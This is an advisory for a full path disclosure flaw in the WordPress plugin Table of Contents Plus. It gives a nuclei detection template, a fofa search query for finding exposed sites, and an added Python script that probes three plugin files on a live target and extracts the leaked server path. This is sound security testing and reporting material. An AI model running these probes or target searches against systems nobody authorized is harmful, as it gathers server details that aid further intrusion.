wp-toc-plus-fpd: WordPress Plugin Table of Contents Plus - Full Path Disclosure

Date: 2026-01-08 | Affected software: WordPress Plugin Table of Contents Plus | PoC: published

Vulnerability description

The Table of Contents Plus WordPress plugin is vulnerable to Full Path Disclosure. Requesting one of the plugin's PHP files directly, outside the WordPress bootstrap, makes PHP call a WordPress function (for example add_action) that is not defined in that context. If display_errors is enabled, the resulting "Fatal error: Call to undefined function ..." page includes the absolute filesystem path of the plugin file, revealing where the web root lives on disk. On its own this is only an information leak (hence the low severity), but an exact server path is what later attacks such as directory traversal or local file inclusion usually need.

PoC code [published]

id: wp-toc-plus-fpd

info:
  name: WordPress Plugin Table of Contents Plus - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    The Table of Contents Plus WordPress plugin is vulnerable to Full Path Disclosure. This vulnerability allows attackers to view the full server path by accessing certain files or triggering error conditions, which can aid in further attacks such as directory traversal or local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to gain insights into the server's directory structure, which can be leveraged to perform further attacks such as directory traversal or local file inclusion.
  remediation: |
    Update the Table of Contents Plus plugin to the latest version. Ensure error reporting is disabled in production environments and implement proper error handling that doesn't expose full paths.
  reference:
    - https://wordpress.org/plugins/table-of-contents-plus/
    - https://wpscan.com/plugins/table-of-contents-plus/
  metadata:
    verified: true
    max-request: 3
    vendor: michael
    product: table-of-contents-plus
    fofa-query: body="wp-content/plugins/table-of-contents-plus"
  tags: wp,wordpress,wp-plugin,table-of-contents-plus,fpd,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/toc-plus.php"
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/toc.php"
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/includes/class-toc.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "undefined function", "table-of-contents-plus")'
        condition: and
# digest: 4a0a00473045022100a3574c18adc12d06c3ee13967da864af0ca25ba3cb1c6190ffd70680ea048ac102201205385e6630e4278c258db4732aaf828b5dc2c7181baf9dce9cbab21779ca7d:922c64590222798bb761d5b6d8e72950
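The following script is an added example, not part of the nuclei template above or of the plugin. It reimplements the template's logic offline so the finding can be verified and reported with evidence: it requests the same three plugin paths, applies the same matcher (HTTP 200 plus the three required substrings, stopping at the first match), and additionally extracts the leaked absolute path from the PHP fatal-error text, which the template itself does not do. The sample response body, the server path inside it, and the demo_fetch responses are constructed for the example; urllib_fetch is an assumed minimal live fetcher.

```python
"""Offline re-implementation of the wp-toc-plus-fpd template logic (added example)."""
import re
import urllib.error
import urllib.request
from typing import Callable, Optional, Tuple

# Paths from the template, relative to the WordPress base URL.
PLUGIN_PATHS = (
    "/wp-content/plugins/table-of-contents-plus/toc-plus.php",
    "/wp-content/plugins/table-of-contents-plus/toc.php",
    "/wp-content/plugins/table-of-contents-plus/includes/class-toc.php",
)

# Substrings the template's contains_all() matcher requires (case-sensitive).
REQUIRED_MARKERS = ("Fatal error", "undefined function", "table-of-contents-plus")

# Absolute path PHP prints after "in " / "thrown in " in an uncaught-error message.
# With html_errors=On the path is wrapped in <b>...</b>; it ends with ":<line>" or
# " on line". Unix and Windows drive-letter paths are both accepted.
_PATH_RE = re.compile(
    r"\bin\s+(?:<b>)?((?:/|[A-Za-z]:\\)[^\s<>\"']+?)(?:</b>)?(?::\d+|\s+on\s+line\b)"
)

# Constructed sample of what PHP emits with display_errors=On and html_errors=On
# when a plugin file is loaded outside WordPress. The server path is made up.
SAMPLE_FATAL_BODY = (
    "<br />\n<b>Fatal error</b>:  Uncaught Error: Call to undefined function "
    "add_action() in /var/www/html/wp-content/plugins/table-of-contents-plus/"
    "toc.php:12\nStack trace:\n#0 {main}\n  thrown in <b>/var/www/html/"
    "wp-content/plugins/table-of-contents-plus/toc.php</b> on line <b>12</b><br />\n"
)


def is_fpd_response(status_code: int, body: str) -> bool:
    """Same decision the template's DSL matcher makes (status 200 AND all markers)."""
    return status_code == 200 and all(marker in body for marker in REQUIRED_MARKERS)


def extract_disclosed_path(body: str) -> Optional[str]:
    """Return the leaked absolute filesystem path from a PHP fatal-error body, or None."""
    match = _PATH_RE.search(body)
    return match.group(1) if match else None


Fetcher = Callable[[str], Tuple[int, str]]


def urllib_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Assumed live fetcher: GET url and return (status, body) without raising on 4xx/5xx."""
    req = urllib.request.Request(url, headers={"User-Agent": "fpd-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url: str, fetch: Fetcher = urllib_fetch) -> Optional[dict]:
    """Request each candidate file in order; return evidence for the first match
    (mirrors stop-at-first-match) or None when no file discloses a path."""
    base = base_url.rstrip("/")
    for path in PLUGIN_PATHS:
        url = base + path
        status, body = fetch(url)
        if is_fpd_response(status, body):
            return {"url": url, "status": status,
                    "disclosed_path": extract_disclosed_path(body)}
    return None


def demo_fetch(url: str) -> Tuple[int, str]:
    """Constructed responses standing in for a live target: toc-plus.php does not
    exist (404), toc.php leaks the fatal error, anything else is a bare 500 as PHP
    returns when display_errors is off."""
    if url.endswith("/toc-plus.php"):
        return 404, "<h1>Not Found</h1>"
    if url.endswith("/toc.php"):
        return 200, SAMPLE_FATAL_BODY
    return 500, ""


if __name__ == "__main__":
    import sys
    # With a base URL argument the live fetcher is used; otherwise the demo responses.
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print(probe("https://wp.example", demo_fetch))
```

The status check matters: a PHP fatal error with display_errors off yields a 500 with an empty body, which is why the template (and probe above) treats only a 200 carrying the error text as a positive. Run with a target URL only against systems you are authorized to test.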
